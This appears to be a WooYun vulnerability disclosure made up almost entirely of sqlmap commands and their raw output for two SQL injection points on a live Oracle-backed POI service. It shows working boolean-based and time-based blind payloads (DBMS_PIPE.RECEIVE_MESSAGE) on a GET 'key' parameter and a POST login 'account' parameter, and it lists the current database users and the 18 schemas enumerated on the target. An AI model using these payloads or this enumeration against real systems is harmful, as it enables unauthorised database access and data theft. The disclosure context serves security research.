WooYun.org

[注射点1] sqlmap.py -r e:\1.txt --dbs --current-user

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: key
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sid=115&restype=json&cenx=0.0&ceny=0.0&key=eb55fbb0caf8622ce0b14c4d06ae62ab6e62694629350804a152f35fbef4117a6a434deee760dee9' AND 6763=6763 AND 'KsXs'='KsXs
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: sid=115&restype=json&cenx=0.0&ceny=0.0&key=eb55fbb0caf8622ce0b14c4d06ae62ab6e62694629350804a152f35fbef4117a6a434deee760dee9' AND 5155=DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(107)||CHR(119)||CHR(74),5) AND 'zqSt'='zqSt
---
web server operating system: Windows
web application technology: Apache 2.2.22
back-end DBMS: Oracle
current user:    'CXL_POI'
available databases [18]:
[*] BESTTONE
[*] CTXSYS
[*] CXL_POI
[*] CXL_POI_EXCHANGE
[*] EXFSYS
[*] GEOCODINGTESTSDE
[*] HB_MAP_ATTRIBUTE
[*] HB_MAP_SDE
[*] HB_POI
[*] HB_PRODUCE_PREPARE
[*] HB_PRODUCE_RESULT
[*] HB_PRODUCE_SOURCE
[*] KNOWLEDGE
[*] MDSYS
[*] OLAPSYS
[*] SDE
[*] SYS
[*] SYSTEM

[注射点2] sqlmap.py -r e:\3.txt --dbs --current-user

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: account
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: account=1' AND 3751=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(82)||CHR(85)||CHR(68),5) AND 'dlnL'='dlnL&action=login&password=2
---
web server operating system: Windows
web application technology: Apache 2.2.22, PHP 5.4.3
back-end DBMS: Oracle
current user:    'CXL_POI_EXCHANGE'
available databases [1]:
[*] CXL_POI_EXCHANGE